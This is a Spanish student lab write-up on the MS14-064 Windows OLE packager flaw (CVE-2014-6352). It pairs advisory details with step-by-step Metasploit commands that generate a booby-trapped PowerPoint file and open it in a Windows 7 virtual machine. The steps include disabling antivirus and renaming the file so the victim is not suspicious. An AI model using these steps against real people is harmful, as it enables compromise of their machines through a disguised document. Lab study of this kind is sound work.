# Parcial Ciberseguridad

**LINK VIDEO** https://youtu.be/1PqZdU87ZvA

**Nombre exploit:** MS14-064 Microsoft OLE Package Manager Code Execution

**Nombre del modulo:** exploit/windows/fileformat/ms14_064_packager_run_as_admin

**Descripción:** Este módulo explota una vulnerabilidad que se encuentra en la vinculación e incrustación de objetos de Windows (OLE), 
                 que permite la ejecución de código arbitrario, que se explota públicamente en la naturaleza como la omisión de parches MS14-060. 
                 La actualización de Microsoft intentó corregir la vulnerabilidad conocida públicamente como "Sandworm". 
                 Plataformas como Windows Vista SP2 hasta Windows 8, Windows Server 2008 y 2012 son vulnerables.
                 Sin embargo, según nuestras pruebas, la configuración más confiable es en plataformas Windows que ejecutan Office 2013 y Office 2010 SP2.
                 Tenga en cuenta que algunas otras configuraciones, como el uso de Office 2010 SP1, pueden ser menos estables y pueden terminar con un bloqueo 
                 debido a una falla en la función CPackage :: CreateTempFileName.

**Autores:**

    1. Haifei Li    
    2. sinn3r <sinn3r [at] metasploit.com>  
    3. juan vazquez <juan.vazquez [at] metasploit.com>

**Referencias:**

    1. https://www.cvedetails.com/cve/cve-2014-6352
    2. https://docs.microsoft.com/en-us/security-updates/securitybulletins/2014/MS14-064
    3. https://www.securityfocus.com/bid/70690
    4. https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/bypassing-microsofts-patch-sandworm-zero-day-root-cause/

**Fecha de publicación:** 21/10/2014

**Plataforma:** Windows

**Sistema Operativo:** Windows 7 SP1 (32 bits)

**Software adicional:** Office 2010 SP2 / Office 2013

**Arquitectura:** x86

**Licencia:** Metasploit Framework License (BSD)

**Vulnerabilidades:**

    - Vulnerabilidad de ejecución remota de código en la matriz de automatización OLE de Windows (CVE-2014-6332):
            Existe una vulnerabilidad de ejecución remota de código cuando Internet Explorer accede de forma incorrecta a los objetos en la memoria. 
            Microsoft recibió información sobre esta vulnerabilidad a través de la divulgación coordinada de vulnerabilidades. 
            Cuando se emitió este boletín de seguridad, Microsoft no había recibido ninguna información que indicara que esta vulnerabilidad se había utilizado públicamente para atacar a los clientes. 
            Esta actualización corrige la vulnerabilidad al modificar la forma en que los sistemas operativos afectados validan el uso de la memoria cuando se accede a los objetos OLE,
            y al modificar la forma en que Internet Explorer maneja los objetos en la memoria.
            
    - Vulnerabilidad de ejecución remota de código OLE en Windows (CVE-2014-6352)
            Existe una vulnerabilidad de ejecución remota de código en el contexto del usuario actual que se produce cuando un usuario descarga o recibe, 
            y luego abre un archivo de Microsoft Office especialmente diseñado que contiene objetos OLE. 
            Microsoft recibió por primera vez información sobre esta vulnerabilidad a través de la divulgación coordinada de vulnerabilidades.
            Esta vulnerabilidad se describió por primera vez en el aviso de seguridad de Microsoft 3010060 . 
            Microsoft es consciente de los ataques limitados que intentan explotar esta vulnerabilidad. 
            Esta actualización corrige la vulnerabilidad al modificar la forma en que los sistemas operativos 
            afectados validan el uso de la memoria cuando se accede a los objetos OLE
            
    - Microsoft Windows CVE-2014-6352 OLE Remote Code Execution Vulnerability
         
        Bugtraq ID:	70690
        Class:	Design Error
        CVE:	CVE-2014-6352
        Remote:	Yes
        Local:	No
        Published:	Oct 21 2014 12:00AM
        Updated:	Nov 24 2014 05:55AM
        Credit:	Drew Hintz, Shane Huntley, and Matty Pellegrino of the Google Security Team, and Haifei Li and Bing Sun of the McAfee Security Team
        Vulnerable:	Microsoft Windows Vista Service Pack 2 0
        Microsoft Windows Server 2008 R2 for x64-based Systems SP1
        Microsoft Windows Server 2008 for x64-based Systems SP2
        Microsoft Windows Server 2008 for Itanium-based Systems SP2
        Microsoft Windows Server 2008 for 32-bit Systems SP2
        Microsoft Windows 7 for x64-based Systems SP1
        Microsoft Windows 7 for 32-bit Systems SP1
        Avaya Messaging Application Server 5.2
        Avaya Meeting Exchange - Webportal 0
        Avaya Communication Server 1000 Telephony Manager 4.0
        Avaya Aura Conferencing 6.0 Standard
        
**Instructivo para realizar el exploit:**

    - Abrir el virtual box
    - Abrir la maquina virtual de KaliLinux 
    - Luego de estar en la maquina virtual de KaliLinux abrir la ventana de comandos (CMD)
    - Despues la ejecucion de comandos, que es la siguiente:
        1. Desactivar cualquier tipo de antivirus que se tenga (Comercial o el antivirus que trae windows por defecto) en la maquina local y en las virtuales
        
        2. service postgresql start 
            Nota: Esta es la base de datos que usa el framework Metasploit, se tiene que inicializar primero el servicio
            
        3. msfconsole 
            Nota: Este comando sirve para inicializar el framework. Dentro de Metasploit estan todos los exploit asignados a cada integrante del curso de ciberseguridad 
            
        4. Cuando aparece el comando mfs5> significa que ya se esta adentro del Metasploit
        
        5. Se ejecuta msf5> search nombre del exploit (para mi caso es ms14_064_packager_run_as_admin)
            Nota: Se muestra la información mas elemental del exploit (Name, Disclosure date , Rank, Check, Description)
            
        6. msf5> use exploit/windows/fileformat/ms14_064_packager_run_as_admin
            Nota: Este comando sirve para ingresar al exploit 
            
        7. msf5 exploit(windows/fileformat/ms14_064_packager_run_as_admin) > show info 
            Nota: Este comando sirve mostrar toda la información a cerca de exploit, es aqui donde se encuentra la maquina virtual y los programas que se necesitan instalar a la misma para realizar el exploit asignado
                  para mi caso se debe instalar una maquina virtual con un sistema operativo windows 7 SP1, el software office 2010 SP2, el software office 2013
        
        8. msf5 exploit(windows/fileformat/ms14_064_packager_run_as_admin) > show options
            Nota: Este comando sirve para mostar que tiene por dentro el exploit , es decir que hay que hacer al exploit 
        
        9. msf5 exploit(windows/fileformat/ms14_064_packager_run_as_admin) > show targets
            Nota: Este comando sirve para mostar los targets que utiliza el exploit, cada target tiene su ID lo que permite en la siguiente instrucción utilizar un target en especifico
        
        10. msf5 exploit(windows/fileformat/ms14_064_packager_run_as_admin) > set TARGET 0
             Nota: Este comando sirve para indicar cual target se va a usar , se indica esto mediante el ID que va despues de la palabra reservada TARGET, para mi caso es el ID 0
            
        11. msf5 exploit(windows/fileformat/ms14_064_packager_run_as_admin) > set FILENAME NombreNuevo.ppsx (En mi caso el nombre del archivo sera PresentacionCiber)
             Nota: Este comando sirve para cambiar el nombre del archivo del exploit (Paso opcional). El exploit genera un archivo con el nombre msf.ppsx por defecto, se sugiere cambiar este nombre para no despertar ninguna sospecha en la victima
        
        12. msf5 exploit(windows/fileformat/ms14_064_packager_run_as_admin) > show options
             Nota: Se ingresa nuevamente a las opciones del del exploit para ver la nueva actualizacion (Cambio de nombre) 
        
        13. msf5 exploit(windows/fileformat/ms14_064_packager_run_as_admin) > exploit
             Nota: Este comando sirve para correr el exploit, lo que hace es generar el archivo infectado (PresentacionCiber.ppsx)
        
        14. Luego se genera la ruta donde se guardo el archivo infectado (Exploit)
             Nota: Para mi caso , la ruta donde se guardo el archivo es /root/.msf4/local/PresentacionCiber.ppsx
        
        15. Se debe crear una carpeta compartida en la maquina local y en las maquinas que se pretende usar (KaliLinux , Windows7 32bits), es decir las maquinas virtuales se deben conectar a la carpeta compartida creada en la maquina local
             Nota: La carpeta compartida en mi caso se creara en el escritorio, entonces se da clic derecho, crear carpeta y por ultimo se da el nombre que se desea 
        
        16. Enlazar la maquina virtual KaliLinux con la carpeta compartida generada en la maquina local
             Nota: Se ingresa al escritorio de KaliLunix en la parte superior se da en la opcion dispositivos-carpetas compartidas-preferencias de carpetas compartidas...-agregar nueva carpeta compartida
        
        17. 16. Enlazar la maquina virtual windows7 con la carpeta compartida generada en la maquina local
             Nota: Se ingresa al escritorio de KaliLunix en la parte superior se da en la opcion dispositivos-carpetas compartidas-preferencias de carpetas compartidas...-agregar nueva carpeta compartida     
        
        18. Luego de tener las maquinas virtuales enlazadas con la carpeta compartida, se coloca el archivo infectado (El cual se genero desde la consola de KaliLinux) dentro de la carpeta compartida
        
        19. El archivo del numeral 18 se abre desde la maquina virtual windows7, para este caso se abre con powe point, y es ahi donde realmente se produce el ataque